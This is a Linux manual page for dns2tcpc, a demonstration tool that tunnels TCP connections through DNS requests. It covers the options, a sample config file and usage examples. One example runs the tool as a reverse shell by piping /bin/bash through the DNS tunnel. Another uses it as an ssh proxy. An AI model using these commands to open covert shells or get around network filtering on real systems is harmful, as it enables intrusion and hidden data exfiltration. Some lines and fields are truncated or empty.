Man Linux: Main Page and Category List


       dns2tcpc - A tunneling tool that encapsulate TCP traffic over DNS.


       dns2tcpc  [  -h  ]  [  -c  ] [ -z domain zone ] [ -d debug_level ] [ -r
       resource ] [ -k key ] [ -f config_file ] [ -e command ]  [  -T  request
       type ] [ -l local_port ] [ server ]


       dns2tcpc  is  a  network tool used to encapsulate TCP communications in
       DNS. When connections are received on a specific port all  TCP  traffic
       is  sent to the remote dns2tcpd server and forwarded to a specific host
       and port. Multiple connections are supported.

       dns2tcpc was written for demonstration purposes.


       -h     Help Menu

       -c     Enable DNS compression. When used, be sure that  all  relay  and
              DNS server support compression and really use it.

       -z domain zone
              Use this domain as endpoint.

       -d debug level
              Change debug level. Levels available are 1, 2 or 3.

       -r resource
              Remote resource to access.

       -k key Pre shared key used for authentication (identification).

       -f config file
              Configuration file to use.

       -T request type
              Request  type  to  use.  Actually  only KEY and TXT requests are

       -e command
              Command to execute, I/O are redirected in the tunnel.

       -l local_port
              Local port accepting incomming connections (or -  for  stdin  on
              UNIX systems).

       -t connection timeout
              Maximum  DNS  server’s answer delay in seconds. A valid delay is
              between 1 and 240 seconds. Default is 3.

       server DNS server to use. The first entry in resolv.conf file  will  be
              choosen if the server is not specified.


       By  default  ${HOME}/.dns2tcprc  is  used  if  no configuration file is
       specified. Here is an example :

              domain =
              resource = ssltunnel
              local_port = 4430
              enable_compression = 0
              debug_level = 1
              key = mykey
              # DNS to use
              server =


       dns2tcpc -k mykey -z mydns

              Ask the dns2tcp server to list available resources.

       ssh -oProxyCommand dns2tcpc -r ssh -l - -z  -k  mykey

              Use dns2tcp as a proxy command with ssh. We try  to  connect  to
              the ssh resource with the key ’mykey’ and the DNS mydns.

       dns2tcpc -r socat-resource -e/bin/bash -i-k mykey -z

              Use  dns2tcp as a reverse shell, the remote shell will appear on
              the socat-resource.

       dns2tcpc -d 1 -f /dev/null -r ssl-tunnel -l 2000 -k mykey   -T  KEY  -z mydns

              Do not use the default configuration file, bind local port  2000
              and  forward  all the traffic on the remote ssl-tunnel resource,
              use the first debug level. Use KEY type DNS requests.


       Olivier Dembour <>